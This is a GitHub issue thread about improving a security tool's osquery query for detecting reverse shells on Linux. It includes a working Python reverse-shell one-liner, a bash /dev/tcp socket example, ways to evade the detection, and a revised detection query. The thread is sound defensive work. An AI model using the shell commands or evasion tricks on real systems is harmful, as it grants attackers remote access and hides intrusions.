### ISSUE TITLE
Reverse shell detection doesn't seem to work in Linux

### ISSUE THREAD

**Issue by micahflee** [firstlookmedia/flock-agent#46]
I copied the query for the reverse shell twig [from here](https://clo.ng/blog/osquery_reverse_shell/). In macOS when I launch a reverse shell using the [perl script from here](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) it detects it, but it doesn't detect it in Linux.

We need to improve reverse shell detection in Linux, either by tweaking that query to work in both Linux and macOS, or by writing separate queries for separate platforms.

**Comment by simonft** [comment]
It looks like since bash 4.0 (the release after the version OSX is on by default) bash checks to see if it knows anything about its controlling TTY. If it doesn't, it opens /dev/tty. Right now the twig checks for processes where the command is "bash" or "sh", the process has a socket connection open, and the process has *any* open file. The check for an open file is done by left outer joining `process_open_sockets`against the process table and filtering for NULLs. This means the twig misses reverse shells using more recent versions of bash.

This also means that the command `python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("localhost",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'`, which matches, can be made to not mach by adding a `x=open("/tmp/file", "w");` somewhere before the `subprocess.call`.

A solution to both the above is to make the open file check more narrow. On linux replacing the `LEFT OUTER JOIN process_open_files` with `LEFT OUTER JOIN (SELECT pid from process_open_files WHERE path LIKE '/dev/pts/%' OR path LIKE '/dev/ttys%') as process_open_files` makes the twig specifically look for instances of bash or sh that don't have a pseudo tty. However, the reverse shell could evade this mitigation simply by opening one of the existing /dev/pts/* files being used by another process run under the same user.

A fix for that might be to just look for processes named "bash" or "sh" (or "dash", "zsh", etc) which have network connections, ignoring the tty check altogether. While it's *possible* to communicate over UTP/TCP from within bash, e.g.:
```
exec 3<>/dev/tcp/127.0.0.1/8888
echo test >&3
```
I've never run into anything that legitimately does this. So I think it's probably low enough noise to remove the tty check altogether. It's possible we end up having to reverse this though.

We should also scope down the JOIN on the socket table. Right now it looks for *any* socket. We probably only want to alert about IPv4 and IPv6 network sockets, and not about things like unix sockets. This can be done by changing the `JOIN process_open_sockets table` to `JOIN (SELECT * from process_open_sockets WHERE family is 2 or family is 10) as process_open_sockets`. This should be tested on OSX since I'm not sure the family numbers match on it.

So I think my final suggestion is 
```
SELECT 
  DISTINCT (processes.pid), 
  processes.parent, 
  processes.name, 
  processes.path, 
  processes.cmdline, 
  processes.cwd, 
  processes.root, 
  processes.uid, 
  processes.gid, 
  processes.start_time, 
  process_open_sockets.remote_address, 
  process_open_sockets.remote_port, 
  (
    SELECT 
      cmdline 
    FROM 
      processes AS parent_cmdline 
    WHERE 
      pid = processes.parent
  ) AS parent_cmdline 
FROM 
  processes 
  JOIN (
    SELECT 
      * 
    FROM 
      process_open_sockets 
    WHERE 
      family is 2 
      OR family is 10
  ) AS process_open_sockets USING (pid) 
WHERE 
  (
    name is 'sh' 
    OR name is 'bash' 
    OR name is 'dash' 
    OR name is 'zsh'
  )
```

Even after all these changes, malicious actors can still get around detection by copying /bin/bash to /tmp/not_bash and running that. And I'm not sure there's a realistic way to fix that. I think the twig is still worthwhile to have, in order to catch some of the more naive reverse shells.

**Comment by micahflee** [comment]
Nice this is awesome. I definitely think this query is an improvement to the existing one, and I confirmed that it worked to detect a reverse shell I just did. I agree there's no way to make this exhaustive, but it's still useful anyway. If you put this in a PR I'll merge it.
